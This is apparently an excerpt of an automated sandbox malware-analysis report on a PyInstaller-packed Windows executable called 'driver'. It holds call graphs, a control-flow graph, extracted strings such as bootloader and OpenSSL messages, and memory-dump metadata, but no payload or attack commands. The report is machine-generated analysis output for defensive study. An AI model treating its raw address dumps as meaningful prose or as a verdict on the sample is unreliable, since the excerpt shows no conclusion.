93285->93286 93287 7ff6a29b3c46 93285->93287 93502 7ff6a29b44d0 49 API calls 93286->93502 93289 7ff6a29b3c50 93287->93289 93290 7ff6a29b3cd4 93287->93290 93288->93284 93498 7ff6a29b90e0 59 API calls _log10_special 93289->93498 93293 7ff6a29b8a20 14 API calls 93290->93293 93298 7ff6a29b3ce0 93293->93298 93294 7ff6a29b3d4f 93295 7ff6a29b3d71 93294->93295 93296 7ff6a29b3d65 93294->93296 93301 7ff6a29b1c80 49 API calls 93295->93301 93503 7ff6a29b4620 93296->93503 93297 7ff6a29b3c55 93299 7ff6a29b3c61 93297->93299 93302 7ff6a29b3cb3 93297->93302 93298->93299 93303 7ff6a29b3ced 93298->93303 93499 7ff6a29b2710 54 API calls _log10_special 93299->93499 93314 7ff6a29b3d2b __vcrt_freefls 93301->93314 93500 7ff6a29b8850 86 API calls 2 library calls 93302->93500 93306 7ff6a29b1c80 49 API calls 93303->93306 93309 7ff6a29b3d0b 93306->93309 93307 7ff6a29b3dc4 93310 7ff6a29b9400 2 API calls 93307->93310 93308 7ff6a29b3cbb 93311 7ff6a29b3cbf 93308->93311 93312 7ff6a29b3cc8 93308->93312 93313 7ff6a29b3d12 93309->93313 93309->93314 93316 7ff6a29b3dd7 SetDllDirectoryW 93310->93316 93311->93299 93312->93314 93501 7ff6a29b2710 54 API calls _log10_special 93313->93501 93314->93307 93315 7ff6a29b3da7 SetDllDirectoryW LoadLibraryExW 93314->93315 93315->93307 93319 7ff6a29b3e0a 93316->93319 93361 7ff6a29b3e5a 93316->93361 93320 7ff6a29b8a20 14 API calls 93319->93320 93328 7ff6a29b3e16 __vcrt_freefls 93320->93328 93321 7ff6a29b3ffc 93323 7ff6a29b4029 93321->93323 93324 7ff6a29b4006 PostMessageW GetMessageW 93321->93324 93322 7ff6a29b3f1b 93514 7ff6a29b33c0 121 API calls 2 library calls 93322->93514 93471 7ff6a29b3360 93323->93471 93324->93323 93326 7ff6a29b3f23 93326->93282 93329 7ff6a29b3f2b 93326->93329 93331 7ff6a29b3ef2 93328->93331 93336 7ff6a29b3e4e 93328->93336 93515 7ff6a29b90c0 LocalFree 93329->93515 93513 7ff6a29b8b30 40 API calls __vcrt_freefls 93331->93513 93336->93361 93506 7ff6a29b6db0 54 API calls _set_fmode 93336->93506 93339 7ff6a29b4043 93517 7ff6a29b6fb0 FreeLibrary 93339->93517 93343 7ff6a29b404f 93346 7ff6a29b3e6c 93507 7ff6a29b7330 117 API calls 2 library calls 93346->93507 93349 7ff6a29b3e81 93352 7ff6a29b3ea2 93349->93352 93364 7ff6a29b3e85 93349->93364 93508 7ff6a29b6df0 120 API calls _log10_special 93349->93508 93352->93364 93509 7ff6a29b71a0 125 API calls 93352->93509 93356 7ff6a29b3ee0 93512 7ff6a29b6fb0 FreeLibrary 93356->93512 93357 7ff6a29b3eb7 93357->93364 93510 7ff6a29b74e0 55 API calls 93357->93510 93361->93321 93361->93322 93364->93361 93511 7ff6a29b2a50 54 API calls _log10_special 93364->93511 93371->93214 93372->93222 93373->93224 93374->93210 93375->93213 93376->93228 93378 7ff6a29bd2fb GetStartupInfoW 93377->93378 93378->93217 93382 7ff6a29cf4f0 93379->93382 93380 7ff6a29cf543 93518 7ff6a29ca884 37 API calls 2 library calls 93380->93518 93382->93380 93384 7ff6a29cf596 93382->93384 93383 7ff6a29cf56c 93383->93237 93519 7ff6a29cf3c8 71 API calls _fread_nolock 93384->93519 93520 7ff6a29bc8c0 93386->93520 93389 7ff6a29b3710 93522 7ff6a29b92f0 FindFirstFileExW 93389->93522 93390 7ff6a29b36eb GetLastError 93527 7ff6a29b2c50 51 API calls _log10_special 93390->93527 93393 7ff6a29b3706 93398 7ff6a29bc5c0 _log10_special 8 API calls 93393->93398 93395 7ff6a29b3723 93528 7ff6a29b9370 CreateFileW GetFinalPathNameByHandleW CloseHandle 93395->93528 93396 7ff6a29b377d 93530 7ff6a29b94b0 WideCharToMultiByte WideCharToMultiByte __vcrt_freefls 93396->93530 93401 7ff6a29b37b5 93398->93401 93400 7ff6a29b378b 93400->93393 93531 7ff6a29b2810 49 API calls _log10_special 93400->93531 93401->93282 93408 7ff6a29b1950 93401->93408 93402 7ff6a29b3730 93403 7ff6a29b3734 93402->93403 93404 7ff6a29b374c __vcrt_InitializeCriticalSectionEx 93402->93404 93529 7ff6a29b2810 49 API calls _log10_special 93403->93529 93404->93396 93407 7ff6a29b3745 93407->93393 93409 7ff6a29b45b0 108 API calls 93408->93409 93410 7ff6a29b1985 93409->93410 93411 7ff6a29b1c43 93410->93411 93412 7ff6a29b7f80 83 API calls 93410->93412 93413 7ff6a29bc5c0 _log10_special 8 API calls 93411->93413 93415 7ff6a29b19cb 93412->93415 93414 7ff6a29b1c5e 93413->93414 93414->93244 93414->93245 93416 7ff6a29c0744 73 API calls 93415->93416 93457 7ff6a29b1a03 93415->93457 93418 7ff6a29b19e5 93416->93418 93417 7ff6a29c00bc 74 API calls 93417->93411 93419 7ff6a29b1a08 93418->93419 93420 7ff6a29b19e9 93418->93420 93421 7ff6a29c040c _fread_nolock 53 API calls 93419->93421 93532 7ff6a29c4f78 11 API calls _set_fmode 93420->93532 93423 7ff6a29b1a20 93421->93423 93425 7ff6a29b1a45 93423->93425 93426 7ff6a29b1a26 93423->93426 93424 7ff6a29b19ee 93533 7ff6a29b2910 54 API calls _log10_special 93424->93533 93431 7ff6a29b1a5c 93425->93431 93432 7ff6a29b1a7b 93425->93432 93534 7ff6a29c4f78 11 API calls _set_fmode 93426->93534 93429 7ff6a29b1a2b 93535 7ff6a29b2910 54 API calls _log10_special 93429->93535 93536 7ff6a29c4f78 11 API calls _set_fmode 93431->93536 93433 7ff6a29b1c80 49 API calls 93432->93433 93435 7ff6a29b1a92 93433->93435 93437 7ff6a29b1c80 49 API calls 93435->93437 93436 7ff6a29b1a61 93537 7ff6a29b2910 54 API calls _log10_special 93436->93537 93439 7ff6a29b1add 93437->93439 93440 7ff6a29c0744 73 API calls 93439->93440 93441 7ff6a29b1b01 93440->93441 93442 7ff6a29b1b35 93441->93442 93443 7ff6a29b1b16 93441->93443 93444 7ff6a29c040c _fread_nolock 53 API calls 93442->93444 93538 7ff6a29c4f78 11 API calls _set_fmode 93443->93538 93446 7ff6a29b1b4a 93444->93446 93448 7ff6a29b1b50 93446->93448 93449 7ff6a29b1b6f 93446->93449 93447 7ff6a29b1b1b 93539 7ff6a29b2910 54 API calls _log10_special 93447->93539 93540 7ff6a29c4f78 11 API calls _set_fmode 93448->93540 93542 7ff6a29c0180 37 API calls 2 library calls 93449->93542 93453 7ff6a29b1b55 93541 7ff6a29b2910 54 API calls _log10_special 93453->93541 93454 7ff6a29b1b89 93454->93457 93543 7ff6a29b2710 54 API calls _log10_special 93454->93543 93457->93417 93459 7ff6a29b8a2a 93458->93459 93460 7ff6a29b9400 2 API calls 93459->93460 93461 7ff6a29b8a49 GetEnvironmentVariableW 93460->93461 93462 7ff6a29b8ab2 93461->93462 93463 7ff6a29b8a66 ExpandEnvironmentStringsW 93461->93463 93465 7ff6a29bc5c0 _log10_special 8 API calls 93462->93465 93463->93462 93464 7ff6a29b8a88 93463->93464 93544 7ff6a29b94b0 WideCharToMultiByte WideCharToMultiByte __vcrt_freefls 93464->93544 93466 7ff6a29b8ac4 93465->93466 93466->93252 93468 7ff6a29b8a9a 93469 7ff6a29bc5c0 _log10_special 8 API calls 93468->93469 93470 7ff6a29b8aaa 93469->93470 93470->93252 93545 7ff6a29b6350 93471->93545 93474 7ff6a29b3399 93516 7ff6a29b3670 FreeLibrary 93474->93516 93476 7ff6a29b3381 93476->93474 93613 7ff6a29b6040 93476->93613 93478 7ff6a29b338d 93478->93474 93622 7ff6a29b61d0 54 API calls 93478->93622 93480->93262 93482 7ff6a29b7fa4 93481->93482 93483 7ff6a29c0744 73 API calls 93482->93483 93488 7ff6a29b807b __vcrt_freefls 93482->93488 93484 7ff6a29b7fc0 93483->93484 93484->93488 93676 7ff6a29c7938 93484->93676 93486 7ff6a29c0744 73 API calls 93489 7ff6a29b7fd5 93486->93489 93487 7ff6a29c040c _fread_nolock 53 API calls 93487->93489 93488->93255 93489->93486 93489->93487 93489->93488 93490->93282 93491->93282 93492->93265 93493->93268 93494->93273 93495->93276 93496->93288 93497->93282 93498->93297 93499->93282 93500->93308 93501->93282 93502->93294 93504 7ff6a29b1c80 49 API calls 93503->93504 93505 7ff6a29b4650 93504->93505 93505->93314 93505->93505 93506->93346 93507->93349 93508->93352 93509->93357 93510->93364 93511->93356 93512->93361 93513->93361 93514->93326 93516->93339 93517->93343 93518->93383 93519->93383 93521 7ff6a29b36bc GetModuleFileNameW 93520->93521 93521->93389 93521->93390 93523 7ff6a29b9342 93522->93523 93524 7ff6a29b932f FindClose 93522->93524 93525 7ff6a29bc5c0 _log10_special 8 API calls 93523->93525 93524->93523 93526 7ff6a29b371a 93525->93526 93526->93395 93526->93396 93527->93393 93528->93402 93529->93407 93530->93400 93531->93393 93532->93424 93533->93457 93534->93429 93535->93457 93536->93436 93537->93457 93538->93447 93539->93457 93540->93453 93541->93457 93542->93454 93543->93457 93544->93468 93546 7ff6a29b6365 93545->93546 93547 7ff6a29b1c80 49 API calls 93546->93547 93548 7ff6a29b63a1 93547->93548 93549 7ff6a29b63cd 93548->93549 93550 7ff6a29b63aa 93548->93550 93552 7ff6a29b4620 49 API calls 93549->93552 93633 7ff6a29b2710 54 API calls _log10_special 93550->93633 93553 7ff6a29b63e5 93552->93553 93554 7ff6a29b6403 93553->93554 93634 7ff6a29b2710 54 API calls _log10_special 93553->93634 93623 7ff6a29b4550 93554->93623 93557 7ff6a29bc5c0 _log10_special 8 API calls 93559 7ff6a29b336e 93557->93559 93559->93474 93576 7ff6a29b64f0 93559->93576 93560 7ff6a29b641b 93562 7ff6a29b4620 49 API calls 93560->93562 93563 7ff6a29b6434 93562->93563 93564 7ff6a29b6459 93563->93564 93565 7ff6a29b6439 93563->93565 93567 7ff6a29b9070 3 API calls 93564->93567 93635 7ff6a29b2710 54 API calls _log10_special 93565->93635 93569 7ff6a29b6466 93567->93569 93568 7ff6a29b63c3 93568->93557 93570 7ff6a29b64b1 93569->93570 93571 7ff6a29b6472 93569->93571 93637 7ff6a29b5820 137 API calls 93570->93637 93572 7ff6a29b9400 2 API calls 93571->93572 93574 7ff6a29b648a GetLastError 93572->93574 93636 7ff6a29b2c50 51 API calls _log10_special 93574->93636 93638 7ff6a29b53f0 93576->93638 93578 7ff6a29b6516 93579 7ff6a29b651e 93578->93579 93580 7ff6a29b652f 93578->93580 93663 7ff6a29b2710 54 API calls _log10_special 93579->93663 93645 7ff6a29b4c80 93580->93645 93584 7ff6a29b654c 93588 7ff6a29b655c 93584->93588 93590 7ff6a29b656d 93584->93590 93585 7ff6a29b653b 93664 7ff6a29b2710 54 API calls _log10_special 93585->93664 93587 7ff6a29b652a 93587->93476 93665 7ff6a29b2710 54 API calls _log10_special 93588->93665 93591 7ff6a29b658c 93590->93591 93592 7ff6a29b659d 93590->93592 93666 7ff6a29b2710 54 API calls _log10_special 93591->93666 93594 7ff6a29b65ac 93592->93594 93595 7ff6a29b65bd 93592->93595 93667 7ff6a29b2710 54 API calls _log10_special 93594->93667 93649 7ff6a29b4d40 93595->93649 93599 7ff6a29b65cc 93668 7ff6a29b2710 54 API calls _log10_special 93599->93668 93600 7ff6a29b65dd 93602 7ff6a29b65ec 93600->93602 93603 7ff6a29b65fd 93600->93603 93669 7ff6a29b2710 54 API calls _log10_special 93602->93669 93605 7ff6a29b660f 93603->93605 93607 7ff6a29b6620 93603->93607 93670 7ff6a29b2710 54 API calls _log10_special 93605->93670 93610 7ff6a29b664a 93607->93610 93671 7ff6a29c7320 73 API calls 93607->93671 93609 7ff6a29b6638 93672 7ff6a29c7320 73 API calls 93609->93672 93610->93587 93673 7ff6a29b2710 54 API calls _log10_special 93610->93673 93614 7ff6a29b6060 93613->93614 93615 7ff6a29b6089 93614->93615 93619 7ff6a29b60a0 __vcrt_freefls 93614->93619 93675 7ff6a29b2710 54 API calls _log10_special 93615->93675 93617 7ff6a29b6095 93617->93478 93618 7ff6a29b1470 116 API calls 93618->93619 93619->93618 93620 7ff6a29b2710 54 API calls 93619->93620 93621 7ff6a29b61ab 93619->93621 93620->93619 93621->93478 93622->93474 93624 7ff6a29b455a 93623->93624 93625 7ff6a29b9400 2 API calls 93624->93625 93626 7ff6a29b457f 93625->93626 93627 7ff6a29bc5c0 _log10_special 8 API calls 93626->93627 93628 7ff6a29b45a7 93627->93628 93628->93560 93629 7ff6a29b9070 93628->93629 93630 7ff6a29b9400 2 API calls 93629->93630 93631 7ff6a29b9084 LoadLibraryExW 93630->93631 93632 7ff6a29b90a3 __vcrt_freefls 93631->93632 93632->93560 93633->93568 93634->93554 93635->93568 93636->93568 93637->93568 93640 7ff6a29b541c 93638->93640 93639 7ff6a29b5424 93639->93578 93640->93639 93643 7ff6a29b55c4 93640->93643 93674 7ff6a29c6b14 48 API calls 93640->93674 93641 7ff6a29b5787 __vcrt_freefls 93641->93578 93642 7ff6a29b47c0 47 API calls 93642->93643 93643->93641 93643->93642 93646 7ff6a29b4cb0 93645->93646 93647 7ff6a29bc5c0 _log10_special 8 API calls 93646->93647 93648 7ff6a29b4d1a 93647->93648 93648->93584 93648->93585 93650 7ff6a29b4d55 93649->93650 93651 7ff6a29b1c80 49 API calls 93650->93651 93652 7ff6a29b4da1 93651->93652 93653 7ff6a29b1c80 49 API calls 93652->93653 93662 7ff6a29b4e23 __vcrt_freefls 93652->93662 93655 7ff6a29b4de0 93653->93655 93654 7ff6a29bc5c0 _log10_special 8 API calls 93656 7ff6a29b4e6e 93654->93656 93657 7ff6a29b9400 2 API calls 93655->93657 93655->93662 93656->93599 93656->93600 93658 7ff6a29b4df6 93657->93658 93659 7ff6a29b9400 2 API calls 93658->93659 93660 7ff6a29b4e0d 93659->93660 93661 7ff6a29b9400 2 API calls 93660->93661 93661->93662 93662->93654 93663->93587 93664->93587 93665->93587 93666->93587 93667->93587 93668->93587 93669->93587 93670->93587 93671->93609 93672->93610 93673->93587 93674->93640 93675->93617 93677 7ff6a29c7968 93676->93677 93680 7ff6a29c7444 93677->93680 93679 7ff6a29c7981 93679->93489 93681 7ff6a29c745f 93680->93681 93682 7ff6a29c748e 93680->93682 93691 7ff6a29ca884 37 API calls 2 library calls 93681->93691 93690 7ff6a29c54dc EnterCriticalSection 93682->93690 93685 7ff6a29c747f 93685->93679 93686 7ff6a29c7493 93687 7ff6a29c74b0 38 API calls 93686->93687 93688 7ff6a29c749f 93687->93688 93689 7ff6a29c54e8 _fread_nolock LeaveCriticalSection 93688->93689 93689->93685 93691->93685 93692 7ff8a8085c00 93694 7ff8a8085c1d 93692->93694 93693 7ff8a8085d23 93695 7ff8a804127b SetLastError 93693->93695 93694->93693 93694->93694 93698 7ff8a8085d3e 93694->93698 93697 7ff8a8085d39 93695->93697 93696 7ff8a804127b SetLastError 93696->93697 93698->93696 93698->93697

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 0 7ff6a29b1000-7ff6a29b3806 call 7ff6a29bfe88 call 7ff6a29bfe90 call 7ff6a29bc8c0 call 7ff6a29c5460 call 7ff6a29c54f4 call 7ff6a29b36b0 14 7ff6a29b3814-7ff6a29b3836 call 7ff6a29b1950 0->14 15 7ff6a29b3808-7ff6a29b380f 0->15 21 7ff6a29b383c-7ff6a29b3856 call 7ff6a29b1c80 14->21 22 7ff6a29b391b-7ff6a29b3931 call 7ff6a29b45b0 14->22 16 7ff6a29b3c97-7ff6a29b3cb2 call 7ff6a29bc5c0 15->16 25 7ff6a29b385b-7ff6a29b389b call 7ff6a29b8a20 21->25 28 7ff6a29b3933-7ff6a29b3960 call 7ff6a29b7f80 22->28 29 7ff6a29b396a-7ff6a29b397f call 7ff6a29b2710 22->29 33 7ff6a29b38c1-7ff6a29b38cc call 7ff6a29c4fa0 25->33 34 7ff6a29b389d-7ff6a29b38a3 25->34 41 7ff6a29b3984-7ff6a29b39a6 call 7ff6a29b1c80 28->41 42 7ff6a29b3962-7ff6a29b3965 call 7ff6a29c00bc 28->42 37 7ff6a29b3c8f 29->37 49 7ff6a29b38d2-7ff6a29b38e1 call 7ff6a29b8a20 33->49 50 7ff6a29b39fc-7ff6a29b3a2a call 7ff6a29b8b30 call 7ff6a29b8b90 * 3 33->50 38 7ff6a29b38af-7ff6a29b38bd call 7ff6a29b8b90 34->38 39 7ff6a29b38a5-7ff6a29b38ad 34->39 37->16 38->33 39->38 51 7ff6a29b39b0-7ff6a29b39b9 41->51 42->29 58 7ff6a29b39f4-7ff6a29b39f7 call 7ff6a29c4fa0 49->58 59 7ff6a29b38e7-7ff6a29b38ed 49->59 76 7ff6a29b3a2f-7ff6a29b3a3e call 7ff6a29b8a20 50->76 51->51 54 7ff6a29b39bb-7ff6a29b39d8 call 7ff6a29b1950 51->54 54->25 68 7ff6a29b39de-7ff6a29b39ef call 7ff6a29b2710 54->68 58->50 64 7ff6a29b38f0-7ff6a29b38fc 59->64 65 7ff6a29b38fe-7ff6a29b3903 64->65 66 7ff6a29b3905-7ff6a29b3908 64->66 65->64 65->66 66->58 69 7ff6a29b390e-7ff6a29b3916 call 7ff6a29c4fa0 66->69 68->37 69->76 79 7ff6a29b3a44-7ff6a29b3a47 76->79 80 7ff6a29b3b45-7ff6a29b3b53 76->80 79->80 83 7ff6a29b3a4d-7ff6a29b3a50 79->83 81 7ff6a29b3b59-7ff6a29b3b5d 80->81 82 7ff6a29b3a67 80->82 84 7ff6a29b3a6b-7ff6a29b3a90 call 7ff6a29c4fa0 81->84 82->84 85 7ff6a29b3b14-7ff6a29b3b17 83->85 86 7ff6a29b3a56-7ff6a29b3a5a 83->86 95 7ff6a29b3a92-7ff6a29b3aa6 call 7ff6a29b8b30 84->95 96 7ff6a29b3aab-7ff6a29b3ac0 84->96 88 7ff6a29b3b2f-7ff6a29b3b40 call 7ff6a29b2710 85->88 89 7ff6a29b3b19-7ff6a29b3b1d 85->89 86->85 87 7ff6a29b3a60 86->87 87->82 97 7ff6a29b3c7f-7ff6a29b3c87 88->97 89->88 91 7ff6a29b3b1f-7ff6a29b3b2a 89->91 91->84 95->96 99 7ff6a29b3be8-7ff6a29b3bfa call 7ff6a29b8a20 96->99 100 7ff6a29b3ac6-7ff6a29b3aca 96->100 97->37 108 7ff6a29b3c2e 99->108 109 7ff6a29b3bfc-7ff6a29b3c02 99->109 102 7ff6a29b3ad0-7ff6a29b3ae8 call 7ff6a29c52c0 100->102 103 7ff6a29b3bcd-7ff6a29b3be2 call 7ff6a29b1940 100->103 113 7ff6a29b3b62-7ff6a29b3b7a call 7ff6a29c52c0 102->113 114 7ff6a29b3aea-7ff6a29b3b02 call 7ff6a29c52c0 102->114 103->99 103->100 115 7ff6a29b3c31-7ff6a29b3c40 call 7ff6a29c4fa0 108->115 111 7ff6a29b3c1e-7ff6a29b3c2c 109->111 112 7ff6a29b3c04-7ff6a29b3c1c 109->112 111->115 112->115 122 7ff6a29b3b87-7ff6a29b3b9f call 7ff6a29c52c0 113->122 123 7ff6a29b3b7c-7ff6a29b3b80 113->123 114->103 124 7ff6a29b3b08-7ff6a29b3b0f 114->124 125 7ff6a29b3d41-7ff6a29b3d63 call 7ff6a29b44d0 115->125 126 7ff6a29b3c46-7ff6a29b3c4a 115->126 137 7ff6a29b3ba1-7ff6a29b3ba5 122->137 138 7ff6a29b3bac-7ff6a29b3bc4 call 7ff6a29c52c0 122->138 123->122 124->103 135 7ff6a29b3d71-7ff6a29b3d82 call 7ff6a29b1c80 125->135 136 7ff6a29b3d65-7ff6a29b3d6f call 7ff6a29b4620 125->136 128 7ff6a29b3c50-7ff6a29b3c5f call 7ff6a29b90e0 126->128 129 7ff6a29b3cd4-7ff6a29b3ce6 call 7ff6a29b8a20 126->129 146 7ff6a29b3c61 128->146 147 7ff6a29b3cb3-7ff6a29b3cbd call 7ff6a29b8850 128->147 141 7ff6a29b3d35-7ff6a29b3d3c 129->141 142 7ff6a29b3ce8-7ff6a29b3ceb 129->142 151 7ff6a29b3d87-7ff6a29b3d96 135->151 136->151 137->138 138->103 159 7ff6a29b3bc6 138->159 148 7ff6a29b3c68 call 7ff6a29b2710 141->148 142->141 149 7ff6a29b3ced-7ff6a29b3d10 call 7ff6a29b1c80 142->149 146->148 164 7ff6a29b3cbf-7ff6a29b3cc6 147->164 165 7ff6a29b3cc8-7ff6a29b3ccf 147->165 160 7ff6a29b3c6d-7ff6a29b3c77 148->160 166 7ff6a29b3d12-7ff6a29b3d26 call 7ff6a29b2710 call 7ff6a29c4fa0 149->166 167 7ff6a29b3d2b-7ff6a29b3d33 call 7ff6a29c4fa0 149->167 156 7ff6a29b3dc4-7ff6a29b3dda call 7ff6a29b9400 151->156 157 7ff6a29b3d98-7ff6a29b3d9f 151->157 172 7ff6a29b3de8-7ff6a29b3e04 SetDllDirectoryW 156->172 173 7ff6a29b3ddc 156->173 157->156 162 7ff6a29b3da1-7ff6a29b3da5 157->162 159->103 160->97 162->156 168 7ff6a29b3da7-7ff6a29b3dbe SetDllDirectoryW LoadLibraryExW 162->168 164->148 165->151 166->160 167->151 168->156 176 7ff6a29b3f01-7ff6a29b3f08 172->176 177 7ff6a29b3e0a-7ff6a29b3e19 call 7ff6a29b8a20 172->177 173->172 180 7ff6a29b3f0e-7ff6a29b3f15 176->180 181 7ff6a29b3ffc-7ff6a29b4004 176->181 187 7ff6a29b3e32-7ff6a29b3e3c call 7ff6a29c4fa0 177->187 188 7ff6a29b3e1b-7ff6a29b3e21 177->188 180->181 184 7ff6a29b3f1b-7ff6a29b3f25 call 7ff6a29b33c0 180->184 185 7ff6a29b4029-7ff6a29b4034 call 7ff6a29b36a0 call 7ff6a29b3360 181->185 186 7ff6a29b4006-7ff6a29b4023 PostMessageW GetMessageW 181->186 184->160 198 7ff6a29b3f2b-7ff6a29b3f3f call 7ff6a29b90c0 184->198 199 7ff6a29b4039-7ff6a29b405b call 7ff6a29b3670 call 7ff6a29b6fb0 call 7ff6a29b6d60 185->199 186->185 200 7ff6a29b3ef2-7ff6a29b3efc call 7ff6a29b8b30 187->200 201 7ff6a29b3e42-7ff6a29b3e48 187->201 191 7ff6a29b3e23-7ff6a29b3e2b 188->191 192 7ff6a29b3e2d-7ff6a29b3e2f 188->192 191->192 192->187 207 7ff6a29b3f41-7ff6a29b3f5e PostMessageW GetMessageW 198->207 208 7ff6a29b3f64-7ff6a29b3fa7 call 7ff6a29b8b30 call 7ff6a29b8bd0 call 7ff6a29b6fb0 call 7ff6a29b6d60 call 7ff6a29b8ad0 198->208 200->176 201->200 206 7ff6a29b3e4e-7ff6a29b3e54 201->206 210 7ff6a29b3e5f-7ff6a29b3e61 206->210 211 7ff6a29b3e56-7ff6a29b3e58 206->211 207->208 249 7ff6a29b3fe9-7ff6a29b3ff7 call 7ff6a29b1900 208->249 250 7ff6a29b3fa9-7ff6a29b3fb3 call 7ff6a29b9200 208->250 210->176 214 7ff6a29b3e67-7ff6a29b3e83 call 7ff6a29b6db0 call 7ff6a29b7330 210->214 211->214 215 7ff6a29b3e5a 211->215 227 7ff6a29b3e8e-7ff6a29b3e95 214->227 228 7ff6a29b3e85-7ff6a29b3e8c 214->228 215->176 231 7ff6a29b3eaf-7ff6a29b3eb9 call 7ff6a29b71a0 227->231 232 7ff6a29b3e97-7ff6a29b3ea4 call 7ff6a29b6df0 227->232 230 7ff6a29b3edb-7ff6a29b3ef0 call 7ff6a29b2a50 call 7ff6a29b6fb0 call 7ff6a29b6d60 228->230 230->176 244 7ff6a29b3ec4-7ff6a29b3ed2 call 7ff6a29b74e0 231->244 245 7ff6a29b3ebb-7ff6a29b3ec2 231->245 232->231 243 7ff6a29b3ea6-7ff6a29b3ead 232->243 243->230 244->176 257 7ff6a29b3ed4 244->257 245->230 249->160 250->249 259 7ff6a29b3fb5-7ff6a29b3fca 250->259 257->230 260 7ff6a29b3fe4 call 7ff6a29b2a50 259->260 261 7ff6a29b3fcc-7ff6a29b3fdf call 7ff6a29b2710 call 7ff6a29b1900 259->261 260->249 261->160
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                                • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                                                • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                                                • Opcode ID: d0508df3f57ee1b007a386c5103efc2761290cd4262653a9171a3b2890b356a0
                                                                                                                                                                                                                                                • Instruction ID: 1277dd79a844d1a4d0e827266c48365d8da19a83f5b3041addea4afc6c45984e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0508df3f57ee1b007a386c5103efc2761290cd4262653a9171a3b2890b356a0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 52328B21A8E68291FA14EB26D4543B966A5EF44F88F844036DA5DC32C7EFACF558F304
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $..\s\ssl\record\ssl3_record.c$CONNE$GET $HEAD $POST $PUT $ssl3_get_record
                                                                                                                                                                                                                                                • API String ID: 0-2781224710
                                                                                                                                                                                                                                                • Opcode ID: b400293baa34000780f5a339118ca863fb8810f07702305baec27cbd6e082666
                                                                                                                                                                                                                                                • Instruction ID: 5104df559e879b727609a9d526eec8cd448b9659fdab984825b40174df789660
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b400293baa34000780f5a339118ca863fb8810f07702305baec27cbd6e082666
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B82AD22A0BA82A5FF209B11D4653B976D0EF41BC4F444036DE8D4B6D6CF3CE5A1CB29
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true
